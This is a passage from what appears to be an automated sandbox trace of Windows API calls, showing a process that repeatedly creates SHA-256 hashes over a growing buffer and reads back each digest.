	[0191.346] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0191.346] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.346] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300898
	[0191.346] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300898, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300898, pdwDataLen=0x1283b0) returned 1
	[0191.346] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.346] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.347] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.347] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.347] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0191.347] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.347] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23008c0
	[0191.347] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23008c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23008c0, pdwDataLen=0x1283b0) returned 1
	[0191.347] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.347] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.347] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.347] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.347] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0191.348] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.348] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23008e8
	[0191.348] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23008e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23008e8, pdwDataLen=0x1283b0) returned 1
	[0191.348] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.348] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.348] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.348] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.348] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0191.348] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.348] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300910
	[0191.348] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300910, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300910, pdwDataLen=0x1283b0) returned 1
	[0191.348] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.348] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.348] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.349] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.349] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0191.349] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.349] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300938
	[0191.349] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300938, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300938, pdwDataLen=0x1283b0) returned 1
	[0191.349] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.349] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.349] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.349] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.349] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0191.349] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.349] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300960
	[0191.349] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300960, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300960, pdwDataLen=0x1283b0) returned 1
	[0191.349] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.349] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.349] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.350] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.350] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0191.350] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.350] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300988
	[0191.350] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300988, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300988, pdwDataLen=0x1283b0) returned 1
	[0191.350] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.350] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.350] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.350] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.350] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0191.350] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.350] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23009b0
	[0191.351] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23009b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23009b0, pdwDataLen=0x1283b0) returned 1
	[0191.351] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.351] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.351] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.351] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.351] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0191.351] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.351] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23009d8
	[0191.351] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23009d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23009d8, pdwDataLen=0x1283b0) returned 1
	[0191.351] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.351] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.351] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.352] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.352] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0191.352] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.352] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300a00
	[0191.352] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300a00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300a00, pdwDataLen=0x1283b0) returned 1
	[0191.352] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.352] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.352] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.352] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.352] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0191.352] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.352] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300a28
	[0191.352] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300a28, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300a28, pdwDataLen=0x1283b0) returned 1
	[0191.352] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.352] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.352] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.353] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.353] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0191.353] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.353] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300a50
	[0191.353] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300a50, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300a50, pdwDataLen=0x1283b0) returned 1
	[0191.353] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.353] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.353] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.353] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.353] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0191.353] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.353] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300a78
	[0191.353] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300a78, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300a78, pdwDataLen=0x1283b0) returned 1
	[0191.353] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.353] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.353] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.354] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.354] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0191.354] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.354] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300aa0
	[0191.354] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300aa0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300aa0, pdwDataLen=0x1283b0) returned 1
	[0191.354] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.354] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.354] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.354] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.354] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0191.354] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.354] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300ac8
	[0191.354] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300ac8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300ac8, pdwDataLen=0x1283b0) returned 1
	[0191.354] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.355] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.355] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.355] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.355] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0191.355] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.355] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300af0
	[0191.355] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300af0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300af0, pdwDataLen=0x1283b0) returned 1
	[0191.355] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.355] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.355] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.355] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.356] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0191.356] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.356] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300b18
	[0191.356] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300b18, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300b18, pdwDataLen=0x1283b0) returned 1
	[0191.356] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.356] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.356] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.356] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.356] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0191.356] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.356] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300b40
	[0191.356] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300b40, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300b40, pdwDataLen=0x1283b0) returned 1
	[0191.356] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.356] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.356] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.357] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.357] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0191.357] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.357] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300b68
	[0191.357] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300b68, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300b68, pdwDataLen=0x1283b0) returned 1
	[0191.357] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.357] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.357] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.357] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.357] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0191.357] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.357] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300b90
	[0191.357] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300b90, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300b90, pdwDataLen=0x1283b0) returned 1
	[0191.357] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.357] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.357] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.358] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.358] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0191.358] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.358] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300bb8
	[0191.358] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300bb8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300bb8, pdwDataLen=0x1283b0) returned 1
	[0191.358] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.358] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.358] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.358] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.358] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0191.358] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.358] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300be0
	[0191.359] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300be0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300be0, pdwDataLen=0x1283b0) returned 1
	[0191.359] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.359] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.359] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.359] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.359] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0191.359] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.359] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300c08
	[0191.359] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300c08, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300c08, pdwDataLen=0x1283b0) returned 1
	[0191.359] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.359] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.359] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.360] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.360] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0191.360] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.360] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300c30
	[0191.360] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300c30, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300c30, pdwDataLen=0x1283b0) returned 1
	[0191.360] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.360] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.360] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.360] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.360] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0191.360] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.360] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300c58
	[0191.360] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300c58, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300c58, pdwDataLen=0x1283b0) returned 1
	[0191.360] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.360] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.360] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.361] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.361] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xb40, dwFlags=0x0) returned 1
